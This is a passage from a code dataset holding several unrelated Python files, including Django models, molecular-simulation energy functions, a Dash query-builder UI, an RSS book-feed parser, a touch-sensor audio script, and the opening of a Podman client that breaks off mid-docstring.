context)\n\n\n\n\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574733031","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db import models\nfrom django.contrib import admin\nfrom datetime import datetime\nfrom django.utils import timezone\n# Create your models here.\n\nclass cms(models.Model):\n cms_id = models.CharField(max_length= 100, blank=False)\n cms_name = models.CharField(max_length= 100, blank=False)\n is_active = models.BooleanField(default=False, blank=False)\n\n def 
__str__(self):\n return self.cms_name\n\n class Meta:\n verbose_name = \"Youtube CMS\"\n verbose_name_plural = \"Youtube CMS(s)\"\n\n\nclass channel(models.Model):\n channel_id = models.CharField(max_length= 100, blank=False)\n channel_name = models.CharField(max_length= 100, blank=False)\n cms_id \t\t = models.ForeignKey(cms, primary_key=False, on_delete=models.CASCADE)\n is_Affiliate_Channel = models.BooleanField(default=False, blank=False)\n is_active \t = models.BooleanField(default=False, blank=False)\n remarks \t\t = models.TextField(default=True, blank=True)\n\n def __str__(self):\n return self.channel_name\n\n class Meta:\n verbose_name = \"Youtube Channel\"\n verbose_name_plural = \"Youtube Channels\"\n\n\nclass facebook(models.Model):\n page_id = models.CharField(max_length= 100, blank=False) \n page_name = models.CharField(max_length= 100, blank=False)\n url \t = models.CharField(max_length= 100, blank=False) \n catagory = models.CharField(max_length= 100, blank=False)\n sub_catagory = models.CharField(max_length= 100, blank=False)\n fans = models.PositiveIntegerField( blank=False, default=0)\n ptat = models.PositiveIntegerField( blank=False, default=0)\n token = models.TextField(blank=True)\n tags \t = models.TextField(default=True, blank = True)\n description = models.TextField(default=True, blank = True)\n remarks = models.TextField(default = False, blank = True)\n is_active = models.BooleanField(default=False, blank = False)\n created_on = models.DateField( (\"Date\"), auto_now_add=True, blank=False )\n\n def __str__(self):\n return self.page_name\n\n class Meta:\n verbose_name = \"Facebook Page\"\n verbose_name_plural = \"Facebook Pages\"\n\n\nclass instagram(models.Model):\n CHOICES_CATAGORY = (('AM', 'Arts Marketing'),('EP', 'Event Planning'),)\n handle = models.CharField(max_length= 100, blank=False) \n account_name = models.CharField(max_length= 100, blank=False)\n url \t = models.CharField(max_length= 100, blank=False) \n catagory = models.CharField(max_length= 2, choices=CHOICES_CATAGORY, blank=True)\n description = models.TextField(default=True, blank = True)\n remarks = models.TextField(default = False, blank = True)\n is_active = models.BooleanField(default=False, blank = False)\n\n def __str__(self):\n return self.account_name\n\n class Meta:\n verbose_name = \"Instagram Account\"\n verbose_name_plural = \"Instagram Accounts\"\t\n\n\nclass twitter(models.Model):\n CHOICES_CATAGORY = (('AM', 'Arts Marketing'),('EP', 'Event Planning'),)\n handle = models.CharField(max_length= 100, blank=False) \n account_name = models.CharField(max_length= 100, blank=False)\t\n url \t = models.CharField(max_length= 100, blank=False) \n catagory = models.CharField(max_length= 2, choices = CHOICES_CATAGORY, blank = True)\n description = models.TextField(default=True, blank = True)\n remarks = models.TextField(default = False, blank = True)\n is_active = models.BooleanField(default=False, blank = False)\n\n def __str__(self):\n return self.account_name\n\n class Meta:\n verbose_name = \"Twitter Handle\"\n verbose_name_plural = \"Twitter Handles\"\t\n\n\nclass youtube_videos(models.Model):\n SPAM_LEVEL = (\n ('NA','None'),\n ('TN','Thumbnail'),\n ('MT','Meta'),\n ('CM','Comma'),\n ('ML','Multiple'),\n )\n\n VIDEO_STATUS = (\n (\"PR\",\"private\"),\n (\"PB\",\"public\"),\n (\"PL\",\"published\"),\n )\n\n channel_id_fk = models.ForeignKey(channel, blank=False, verbose_name=\"Select Channel\", on_delete=models.CASCADE)\n video_id = models.CharField(max_length=30, blank=False, 
verbose_name=\"Video ID As In Youtube\")\n video_title = models.CharField(max_length=250, blank=False, verbose_name=\"Video Title\")\n thumbnail = models.CharField(max_length=50, default=\"\", blank=True, verbose_name=\"Thumbnail URL\")\n video_description = models.TextField(default=False, blank=False, verbose_name=\"Video Description\")\n video_tags = models.TextField(default=False, blank=False, verbose_name=\"Video Tags\")\n video_status = models.CharField( max_length = 2, choices = VIDEO_STATUS, blank=False, verbose_name=\"Video Status\")\n video_published_at = models.DateTimeField( default=datetime.now, blank=True, verbose_name=\"Video Published Time\")\n spam_level = models.CharField( max_length = 2, choices = SPAM_LEVEL, default='NA', blank=True )\n qc_action = models.BooleanField( default=False, blank=True )\n\n def __str__(self):\n return \"%s\" % (self.video_title)\n\n class Meta:\n verbose_name=\"Youtube Video\"\n verbose_name_plural = \"Youtube Videos\"\n\n","sub_path":"property/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"248455170","text":"import numpy as np\nfrom abc import ABC, abstractmethod\n\nclass EnergyFunction(ABC):\n \"\"\"This class is an abstract class for all the energy functions that are\n going to be written. All energy functions that inherit this structure MUST\n have a calc_energy method and a cutoff_correction method.\n \"\"\"\n\n @abstractmethod\n def calc_energy(self):\n pass\n\n @abstractmethod\n def cutoff_correction(self):\n pass\n\nclass LJ(EnergyFunction):\n \"\"\"Setup for the Lennard-Jones potential.\n\n Parameters\n ----------\n epsilon: float, int\n sigma: float, int\n \"\"\"\n\n def __init__(self, epsilon: (int, float) = 0.5,\n sigma: (int, float) = 1.0):\n self.sigma = float(sigma)\n self.epsilon = float(epsilon)\n\n def calc_energy(self, r):\n return (4 * self.epsilon * ((self.sigma / r) ** 12\n - (self.sigma / r) ** 6))\n\n def cutoff_correction(self, cutoff, number_particles, box_length):\n return(0)\n\nclass Buckingham(EnergyFunction):\n \"\"\"Set-up for the Buckingham potential.\n \n Parameters\n ----------\n rho: float, int\n a: float, int\n c: float, int\n \"\"\"\n\n def __init__(self, rho: (int, float) = 1.0, a: (int, float) = 1.0,\n c: (int, float) = 1.0):\n self.rho = float(rho)\n self.a = float(a)\n self.c = float(c)\n\n def calc_energy(self, r):\n return self.a * np.exp(-r / self.rho) - self.c / r ** 6\n\n def cutoff_correction(self, cutoff, number_particles, box_length):\n return(0)\n\nclass UnitlessLJ(EnergyFunction):\n \"\"\"Set-up for the Buckingham potential.\n \n Parameters\n ----------\n r: float, int\n \"\"\"\n\n def __init__(self):\n pass\n\n def calc_energy(self, r: (int, float) = None):\n return 4.0 * (np.power(1 / r, 12)\n - np.power(1 / r, 6))\n\n def cutoff_correction(self, cutoff, number_particles, box_length):\n volume = np.power(box_length, 3)\n sig_by_cutoff3 = np.power(1.0 / cutoff, 3)\n sig_by_cutoff9 = np.power(sig_by_cutoff3, 3)\n e_correction = sig_by_cutoff9 - 3.0 * sig_by_cutoff3\n\n e_correction *= 8.0 / 9.0 * np.pi * number_particles / volume * number_particles\n\n return e_correction\n\n\nclass potentialEnergyFactory:\n def __init__(self):\n self.methods = {'LJ': LJ,\n 'Buckingham': Buckingham,\n 'UnitlessLJ': UnitlessLJ,\n }\n\n def build_energy_method(self, potential_type, **kwargs):\n energy_class = self.methods[potential_type](**kwargs)\n\n return 
(energy_class)\n\n\nclass Energy:\n def __init__(self, potential_type='UnitlessLJ', simulation_cutoff=3.0,\n **kwargs):\n self.energy_obj = potentialEnergyFactory().build_energy_method(\n potential_type, **kwargs)\n self.simulation_cutoff = simulation_cutoff\n\n def calculate_tail_correction(self, number_particles, box_length):\n \"\"\"This function computes the standard tail energy correction for the LJ potential\n Parameters\n ----------\n box_length : float, int\n length of one side of the simulation box (cube)\n cutoff: float, int\n the cutoff for the tail energy truncation\n num_particles: int\n number of particles\n Returns\n -------\n e_correction: float\n tail correction of energy\n \"\"\"\n e_correction = self.energy_obj.cutoff_correction(\n self.simulation_cutoff, number_particles, box_length)\n return e_correction\n\n def _minimum_image_distance(self, r_i, r_j, box_length):\n \"\"\"\n Calculates the shortest distance between a particle and another\n instance in a periodic boundary condition image\n Parameters\n ----------\n r_i: np.array([n,3])\n The x, y, z coordinates for a particle, i.\n r_j: np.array([n,3])\n The x, y, z coordinates for a particle, j.\n box_length: float, int\n The length of a side of the simulation box for the periodic boundary.\n Returns\n -------\n distance: float\n The minimum image distance between the two particles, r_i and r_j.\n \"\"\"\n # This function computes the minimum image distance between two particles\n rij = r_i - r_j\n rij = rij - box_length * np.round(rij / box_length)\n rij2 = np.dot(rij, rij)\n distance = np.sqrt(rij2)\n\n return distance\n\n def calculate_initial_energy(self, coordinates, box_length):\n \"\"\"Iterates over a set of coordinates to calculate total system energy.\n This function computes the sum of all pairwise VDW energy between each\n pair of particles in the system. This is the first instance of the\n energy calculation. Subsequent uses call calculate_pair_energy.\n Parameters\n ----------\n coordinates : np.array([n,3])\n An array of atomic coordinates. Size should be [n, 3] where n is the\n number of particles.\n box_length : float\n A float indicating the size of the simulation box. Can be either\n hard-coded or calculated using num_particles and reduced_density.\n Note: the cutoff distance between interacting particles is taken from\n self.simulation_cutoff (the comparison uses the distance itself, not\n its square).\n Returns\n -------\n e_total : float\n The sum of all pairwise VDW energy between each pair of particles in\n the system.\n \"\"\"\n e_total = 0.0\n particle_count = len(coordinates)\n for i_particle in range(particle_count):\n for j_particle in range(i_particle):\n r_i = coordinates[i_particle]\n r_j = coordinates[j_particle]\n rij = self._minimum_image_distance(r_i, r_j, box_length)\n if rij < self.simulation_cutoff:\n e_pair = self.energy_obj.calc_energy(rij)\n e_total += e_pair\n return e_total\n
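\n # Worked example (an illustrative aside, not in the original): with box_length = 10.0,\n # particles at x = 0.5 and x = 9.5 are 9.0 apart naively, but 9.0 - 10.0 * round(9.0 / 10.0)\n # = -1.0, so the minimum image distance used above is 1.0.\n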
\n def calculate_pair_energy(self, coordinates, box_length, i_particle):\n \"\"\"This function computes the sum of all pairwise VDW energy between each\n pair of particles in the system.\n Parameters\n ----------\n coordinates : np.array\n An array of atomic coordinates. Size should be (n, 3) where n is the\n number of particles.\n box_length : float\n A float indicating the size of the simulation box. Can be either\n hard-coded or calculated using num_particles and reduced_density.\n cutoff: float\n The cutoff distance between two interacting particles (taken from\n self.simulation_cutoff).\n i_particle: integer\n Initial particle for the pairwise count\n Returns\n -------\n e_total : float\n The sum of all pairwise VDW energy between this particle and the rest\n of the system.\n \"\"\"\n\n # This function computes the energy of a particle with\n # the rest of the system\n\n e_total = 0.0\n\n i_position = coordinates[i_particle]\n\n particle_count = len(coordinates)\n\n for j_particle in range(particle_count):\n\n if i_particle != j_particle:\n\n j_position = coordinates[j_particle]\n\n rij = self._minimum_image_distance(i_position, j_position,\n box_length)\n\n if rij < self.simulation_cutoff:\n e_pair = self.energy_obj.calc_energy(rij)\n e_total += e_pair\n return e_total\n\n\ndef main():\n energy_factory = potentialEnergyFactory()\n lj_energy = energy_factory.build_energy_method('UnitlessLJ')\n print(lj_energy.calc_energy(2.0))\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"mm_2019_sss_2/energy.py","file_name":"energy.py","file_ext":"py","file_size_in_byte":8016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515665754","text":"import requests\nimport pandas as pd\nimport json\nimport sqlalchemy as db\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nfrom dash.dependencies import Input, Output, State\nimport yaml\nimport io\nfrom flask import send_file\nimport base64\n\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])\n\ndbname = 'ukb'\nhost = '127.0.0.1'\nport = 5432\nuser = 'test'\npassword = 'put this in some env please'\n\nconnectstring = \"postgresql://\" + user + \":\" + password + \"@\" + host + \"/\" + dbname\ndb_engine = db.create_engine(connectstring, echo=False)\n\n#headers = {\n#'Accept': 'application/json',\n#}\n#response = requests.get('http://127.0.0.1:5000/ukbrest/api/v1.0/phenotype/fields', headers=headers)\n#r = json.loads(response.text)\n\n#dashapp.layout = html.Div(\"UKBiobank query tool\")\n\nsql_st = '''\nselect column_name, description\nFROM fields\n'''\np = results_iterator = pd.read_sql(\n sql_st, db_engine\n)\n\ndefaultcols = ['c31_0_0', 'c34_0_0', 'c52_0_0'] # Sex, yob, mob\nsamples_filters = ['eid > 0']\n\ncolnames = []\nfor ix, row in p.iterrows():\n readble_col_desc = row['description'] + '_' + row['column_name']\n colnames.append({'label': readble_col_desc, 'value': row['column_name']})\n\n\nsearchbox = dbc.Container(\n [\n dcc.Store(id='yaml-store-id'),\n html.Div(id='hidden-div-id', style={'display':'none'}),\n html.H2(\"Select columns\"),\n dcc.Dropdown(options=colnames, id='columnsearch-id', multi=True, \n value=['sex_c31_0_0', 'c31_0_0']),\n html.P(),\n ])\n\n\ndata = dbc.Container([ \n html.P(),\n dbc.Textarea(\n placeholder='...',\n value='',\n style={'width': '100%', 'height': '45%'},\n id='yaml-id', bs_size=\"md\"\n ),\n html.P(), \n html.A(\"Download YAML\", id='download-url-id', href=\"\", download=\"Download.yml\") \n ])\n\n\napp.layout = html.Div([searchbox, data])\n\n@app.callback(\n Output(component_id='yaml-id', component_property='value'), \n [Input(component_id='columnsearch-id', component_property='value')]\n)\ndef getdata(columnsearchvals):\n df = pd.DataFrame(colnames)\n searchcols = defaultcols + columnsearchvals\n df = 
df[df['value'].isin(searchcols)]\n dictcols = {'data': dict(zip(df['label'], df['value']) )}\n dictfilter = {'samples_filters': samples_filters}\n dictcols.update(dictfilter)\n #global datayaml \n datayaml = yaml.dump(dictcols)\n return datayaml\n\n\n@app.callback(\n Output(component_id='download-url-id', component_property='href'), \n [Input(component_id='yaml-id', component_property='value')],\n)\n\ndef download(yaml):\n b64 = base64.b64encode(yaml.encode()).decode() # some strings <-> bytes conversions necessary here\n return f'data:file/yml;base64,{b64}'\n\n#headers = {\n#'Accept': 'application/json',\n#}\n#response = requests.get('http://p23-services:5000/ukbrest/api/v1.0/phenotype/', headers=headers)\n#r = json.loads(response.text)\n\n#curl -X POST -H \"Accept: text/csv\" -F file=@get_freesurfer.yaml -F section=data http://p23-services:5000/ukbrest/api/v1.0/query\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","sub_path":"app_ui.py","file_name":"app_ui.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"550914874","text":"class Solution:\n #solution 1\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n return self.maxArea(heights, 0, len(heights) - 1)\n\n def maxArea(self, heights, s, e):\n if s > e:\n return 0\n if s == e:\n return heights[s]\n m = (s + e) // 2\n leftmax = self.maxArea(heights, s, m)\n rightmax = self.maxArea(heights, m + 1, e)\n midmax = self.midmaxArea(heights, s, m, e)\n return max(leftmax, rightmax, midmax)\n\n def midmaxArea(self, heights, s, m, e):\n area = 0\n i = m\n j = m + 1\n h = min(heights[i], heights[j])\n while i >= s and j <= e:\n h = min(h, heights[i], heights[j])\n area = max(area, h * (j - i + 1))\n if i == s:\n j += 1\n elif j == e:\n i -= 1\n else:\n if heights[i - 1] > heights[j + 1]:\n i -= 1\n else:\n j += 1\n return area\n\n #solution 2\n def largestRectangleAreaV2(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n heights.append(0)\n stack = [-1]\n ans = 0\n for i in range(len(heights)):\n while heights[i] < heights[stack[-1]]:\n h = heights[stack.pop()]\n w = i - stack[-1] - 1\n ans = max(ans, h * w)\n stack.append(i)\n heights.pop()\n return ans\n\n \n\n\nif __name__ == '__main__':\n heights = [2, 1, 5, 6, 2, 3]\n print(Solution().largestRectangleAreaV2(heights))","sub_path":"84LargestRectangleInHistogram/84.py","file_name":"84.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"410073912","text":"import pygame\nfrom gui import updatable\n\nclass Entity(updatable.Updatable):\n \"\"\"Each object in the game is an entity. 
It has a sprite, and an animation of two frames.\n\n Members :\n * sprite : picture currently representing the entity\n * screen : display zone where the entity is printed\n * x, y : position\n * next_image : picture to print on the next update\n \"\"\"\n\n _sprite = None\n _screen = None\n\n _x = None\n _y = None\n _next_image = None\n\n def init(self, screen, image, x, y):\n \"\"\"Set the entity attributes, and print it in the game display\"\"\"\n self._sprite = pygame.sprite.Sprite()\n surface = pygame.image.load(image).convert()\n self._surface = surface\n surface.set_colorkey(pygame.Color(255,0,255,0))\n\n #self.create_image(surface)\n\n self._sprite.image = surface.subsurface((0,0, 23, 23))\n self._next_image = surface.subsurface((23,0, 23, 23))\n\n self._sprite.rect = self._sprite.image.get_rect()\n self._screen = screen\n self._sprite.rect.topleft = [x, y]\n self._x = x\n self._y = y\n\n\n def update(self):\n \"\"\"Switch to the next picture for the animation\"\"\"\n tmp_image = self._sprite.image\n self._sprite.image = self._next_image\n self._next_image = tmp_image\n\n self._sprite.rect = self._sprite.image.get_rect()\n self._sprite.rect.topleft = [self._x, self._y]\n\n self._screen.blit(self._sprite.image, self._sprite.rect)\n","sub_path":"src/gui/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"340242324","text":"\"\"\"\nThis script takes the Online Books RSS feed URL as input, saves the feed to an\n.xml file, and processes that file to emit JSON records containing each book's\nTitle, Year, and Author.\n\"\"\"\n
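# A hedged aside (illustration only, not part of this script): the split-based\n# parsing in main() breaks when a title itself contains parentheses; a single\n# regex such as\n#   re.match(r'(?P<title>.+?)\\s*\\((?P<middle>.*?)(?P<year>c?\\d{4})\\), by (?P<author>.+)', item)\n# could capture the same Title/Year/Author fields in one pass.\n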
Then creates an .xml file and \nprocesses the .xml file to return json file that contains Title, Year, and Author of book information\n\"\"\"\n# importing the required modules\n\nimport json\nimport requests\nimport xml.etree.ElementTree as ET\n\ndef loadRSS():\n\n # url of rss feed\n url = 'https://onlinebooks.library.upenn.edu/newrss.xml'\n\n # creating HTTP response object from given url\n resp = requests.get(url)\n\n # saving the xml file\n with open('onlinebooks.xml', 'wb') as f:\n f.write(resp.content)\n\n\ndef parseXML(xmlfile):\n\n # create element tree object\n tree = ET.parse(xmlfile)\n\n # get root element\n root = tree.getroot()\n\n # create empty list for book items\n bookitems = []\n\n # iterate book item\n for item in root.findall('./channel/item'):\n\n for child in item:\n if child.tag == 'description':\n\n # append description to list of items\n bookitems.append(child.text)\n return bookitems\n\n\n\n\n\ndef main():\n #url=argv[1]\n # load rss from web to update existing xml file\n loadRSS()\n\n # parse xml file\n bookitems = parseXML('onlinebooks.xml')\n book={}\n for item in bookitems:\n line=item.split(\"(\")\n title=line[0]\n rest=line[1]\n year_author=rest.split(\")\")\n year_publisher=year_author[0]\n year_published=year_publisher.split(\" \")\n year=year_published[len(year_published)-1]\n if len(year)>4:\n year=year.replace('c','')\n author=year_author[1]\n author=author.replace(\", by \",'')\n if year.isdigit():\n\n book[\"Title\"] = title\n book[\"Year\"] = year\n book[\"Author\"]=author\n\n print(json.dumps(book))\n \nif __name__ == \"__main__\":\n\n main()\n","sub_path":"read_rss.py","file_name":"read_rss.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"340242324","text":"import os\nfrom collections import defaultdict\n\nfrom sequana.fasta_gff_correction import FastaGFFCorrection\n\nfrom . 
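main() in read_rss.py above recovers Title/Year/Author purely by splitting the description on parentheses. Tracing that logic on one hypothetical description string shows the input shape it assumes:

item = "The Example Book (Sample Press, c1905), by Jane Doe"
before, rest = item.split("(")
inside, after = rest.split(")")
year = inside.split(" ")[-1]
if len(year) > 4:  # the script strips a leading copyright 'c' this way
    year = year.replace("c", "")
author = after.replace(", by ", "")
assert (before.strip(), year, author) == ("The Example Book", "1905", "Jane Doe")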
import test_dir\n\n\ndef test_fasta_gff_correction(tmpdir):\n # test with a custom fasta\n in_fasta = f\"{test_dir}/data/fasta_gff_correction/test.fa\"\n in_gff = f\"{test_dir}/data/fasta_gff_correction/test.gff3\"\n in_vcf = f\"{test_dir}/data/fasta_gff_correction/test.vcf\"\n\n\n out_fasta = tmpdir.join('test.fa')\n out_gff = tmpdir.join('test.gff3')\n\n f = FastaGFFCorrection(in_fasta, in_vcf)\n f.fix_and_save_fasta(out_fasta)\n f.fix_and_save_gff(in_gff, out_fasta, out_gff)\n\n # we can read the output gff and output sequence back and count the stop/start codons\n\n assert f.get_all_start_codons(out_fasta, out_gff, \"AE000666_1\", strand=\"+\") ==\\\n defaultdict(int, {'ATG': 50, 'TTG': 17, 'GTG': 13})\n\n assert f.get_all_stop_codons(out_fasta, out_gff, \"AE000666_1\", strand=\"+\")==\\\n defaultdict(int, {'TGA': 29, 'TAA': 31, 'TAG': 20})\n\n assert f.get_all_start_codons(out_fasta, out_gff, \"AE000666_1\", strand=\"-\")==\\\n defaultdict(int, {'CAT': 43, 'CAC': 9, 'CAA': 12})\n\n assert f.get_all_stop_codons(out_fasta, out_gff, \"AE000666_1\", strand=\"-\")==\\\n defaultdict(int, {'TTA': 35, 'TCA': 17, 'CTA': 12})\n","sub_path":"test/test_fasta_gff_correction.py","file_name":"test_fasta_gff_correction.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125434028","text":"#!/usr/bin/python\n\nimport sys\nimport time, math, random, threading, glob, os\n\n#import pygame\nimport subprocess as sp\nfrom os import environ\n\n\nimport Adafruit_MPR121.MPR121 as MPR121\n\n\ncap = MPR121.MPR121()\n\n\nif not cap.begin():\n print ('Error: Did you forget to sudo? If no, Must Reboot')\n sys.exit(1)\n\nenv =environ.copy()\nenv['AUDIODEV'] = 'front:CARD=Device,DEV=0'\n\n#pygame.init()\n#pygame.mixer.init()\n#pygame.mixer.set_num_channels(1)\n#sfx = pygame.mixer.Channel(0)\n\nsfxFiles = glob.glob(\"audio/*.wav\") #Sorry, not including the audio on github\nnSFX = len(sfxFiles)\nlast = random.randrange(0, (nSFX-1))\ntext = sfxFiles[last]\n#while (pygame.mixer.get_init() == None):\n# print('waiting')\n# time.sleep(0.2)\n#text = pygame.mixer.music.load(sfxFiles[nextt])\n#print(nSFX, text, sfxFiles)\n\ndef touch ():\n if not os.path.exists('/tmp/sexbot2'):\n open('/tmp/sexbot2', 'a').close() \n return\n\ntouch()\ncount = 0\nshould_touch = 600 # once per minute\n\n\nlast_touched = cap.is_touched(1) or cap.is_touched(2)\nwhile True:\n current_touched = cap.is_touched(1) or cap.is_touched(2)\n #pygame.event.pump()\n #pin_bit = 1 << 1\n # First check if transitioned from not touched to touched.\n if current_touched and (not last_touched):\n #print '{0} touched!'.format(i)\n #if( not sfx.get_busy()):\n # time.sleep(0.4)\n #sfx.play(text)\n #text.play()\n # print(sfxFiles[nextt])\n # pygame.mixer.music.load(sfxFiles[nextt])\n # pygame.mixer.music.play()\n #print(text.get_volume())\n # nextt = last\n # while ((nSFX > 1) and (nextt != last)):\n # nextt = random.randrange(0, (nSFX-1))\n #text = pygame.mixer.Sound(sfxFiles[nextt])\n # last = nextt\n touch()\n print(\"playing\")\n sp.call(['play', text], env=env)\n touch()\n nextt=last\n while ((nSFX > 1) and (nextt == last)):\n nextt = random.randrange(0, (nSFX-1))\n \n text = sfxFiles[nextt]\n last=nextt\n count = 0\n # Next check if transitioned from touched to not touched.\n #if not current_touched & pin_bit and last_touched & pin_bit:\n #print '{0} released!'.format(i)\n # Update last state and wait a short period before repeating.\n last_touched = 
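The main loop of Talk.py above only starts playback on the transition from not-touched to touched, a standard rising-edge detect. The core of that pattern, with a simulated sample stream standing in for cap.is_touched():

samples = [False, False, True, True, False, True]  # simulated touch readings
presses = 0
last = samples[0]
for current in samples[1:]:
    if current and not last:  # fires once per press, not once per reading
        presses += 1
    last = current
assert presses == 2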
current_touched\n    \n    count += 1\n    count %= should_touch\n    #print(count)\n    if (count == 0):\n        touch()\n\n    time.sleep(0.1)\n","sub_path":"examples/Talk.py","file_name":"Talk.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244159740","text":"# coding: utf-8\n# author: HotDogDevBr.\n# E-mail: hotdogdevbr@gmail.com\n\"\"\"\n    Write a program that asks for the initial deposit and the interest\nrate of a savings account. Display the values month by month for the\nfirst 24 months.\n    Print the total interest earned over the period.\n\"\"\"\ndeposito_inicial = float(input(\"Enter the initial deposit amount: \"))\ntaxa_mes = int(input(\"Enter the monthly interest rate: \"))\ntotal = deposito_inicial\ncontado = 1\ntaxa_mes = taxa_mes / 100\n\nwhile contado <= 24:\n    print(\"Month {:<2} of 24, amount added {:.2f}\".format(\n        contado, total * taxa_mes))\n    total = total + (total * taxa_mes)\n    contado += 1\n\nprint(\"Initial amount was R$ {:.2f}\".format(deposito_inicial))\nprint(\"Monthly interest rate was {:.0f}%\".format(taxa_mes * 100))\nprint(\"Final amount was R$ {:.2f}\".format(total))\n","sub_path":"Exercicios Livro Python/capitulo 5/exercicio 5.11.py","file_name":"exercicio 5.11.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64617887","text":"\"\"\"Client for connecting to Podman service.\"\"\"\nimport logging\nimport os\nimport ssl\nfrom contextlib import AbstractContextManager\nfrom typing import Any, Dict, Mapping, Optional, Union\n\nfrom podman.api.client import APIClient\nfrom podman.domain.containers_manager import ContainersManager\nfrom podman.domain.events import EventsManager\nfrom podman.domain.images_manager import ImagesManager\nfrom podman.domain.manifests import ManifestsManager\nfrom podman.domain.networks_manager import NetworksManager\nfrom podman.domain.pods_manager import PodsManager\nfrom podman.domain.secrets import SecretsManager\nfrom podman.domain.system import SystemManager\nfrom podman.domain.volumes import VolumesManager\nfrom podman.tlsconfig import TLSConfig\n\nlogger = logging.getLogger(\"podman\")\n\n\nclass PodmanClient(AbstractContextManager):\n    \"\"\"Create client connection to Podman service\"\"\"\n\n    def __init__(\n        self,\n        base_url: str = None,\n        version: str = None,\n        timeout: int = 60,\n        tls: Union[bool, TLSConfig] = False,\n        user_agent: str = None,\n        credstore_env: Optional[Mapping[str, str]] = None,\n        use_ssh_client: bool = False,\n        max_pool_size: int = 5,\n    ) -> None:\n        \"\"\"Instantiate PodmanClient object\n\n        Args:\n            base_url: URL to Podman service.\n            version: API version to use. Default: auto, use version from server\n            timeout: Timeout for API calls, in seconds. Default: 60\n            tls: Enable TLS connection to service. True uses default options which\n                may be overridden using a TLSConfig object\n            user_agent: User agent for service connections. Default: PodmanPy/\n            credstore_env: Dict containing environment for credential store\n            use_ssh_client: Use system ssh agent rather than ssh module. 
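The savings loop in exercicio 5.11.py compounds monthly, so its final balance can be checked against the closed form P * (1 + r) ** n. A quick numeric check with assumed example inputs:

principal, rate, months = 1000.0, 0.01, 24  # assumed example inputs
total = principal
for _ in range(months):
    total += total * rate  # the same update the exercise performs
assert abs(total - principal * (1 + rate) ** months) < 1e-6
print(f"final balance: {total:.2f}, interest earned: {total - principal:.2f}")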
Default:False\n max_pool_size: Number of connections to save in pool\n \"\"\"\n if not base_url:\n uid = os.geteuid()\n if uid == 0:\n elements = [\"http+unix://\", \"run\", \"podman\", \"podman.sock\"]\n else:\n elements = [\"http+unix://\", \"run\", \"user\", str(uid), \"podman\", \"podman.sock\"]\n base_url = \"%2F\".join(elements)\n self.base_url = base_url\n\n _ = use_ssh_client\n\n self.api = APIClient(\n base_url=base_url,\n version=version,\n timeout=timeout,\n tls=tls,\n user_agent=user_agent,\n num_pools=max_pool_size,\n credstore_env=credstore_env,\n )\n\n def __enter__(self) -> \"PodmanClient\":\n return self\n\n def __exit__(self, exc_type, exc_value, traceback) -> None:\n self.close()\n\n @classmethod\n def from_env(\n cls,\n version: str = \"auto\",\n timeout: int = -1,\n max_pool_size: int = 60,\n ssl_version: int = None,\n assert_hostname: bool = False,\n environment: dict = None,\n credstore_env: dict = None,\n use_ssh_client: bool = False,\n ) -> \"PodmanClient\":\n \"\"\"Returns connection to service using environment variables and parameters.\n\n Environment variables:\n DOCKER_HOST, CONTAINER_HOST: URL to Podman service\n DOCKER_TLS_VERIFY, CONTAINER_TLS_VERIFY: Verify host against CA certificate\n DOCKER_CERT_PATH, CONTAINER_CERT_PATH: Path to TLS certificates for host connection\n\n Args:\n version: API version to use. Default: auto, use version from server\n timeout: Timeout for API calls, in seconds. Default: 60\n max_pool_size: Number of connections to save in pool.\n ssl_version: Valid SSL version from ssl module\n assert_hostname: Verify hostname of service\n environment: Dict containing input environment. Default: os.environ\n credstore_env: Dict containing environment for credential store\n use_ssh_client: Use system ssh agent rather than ssh module. 
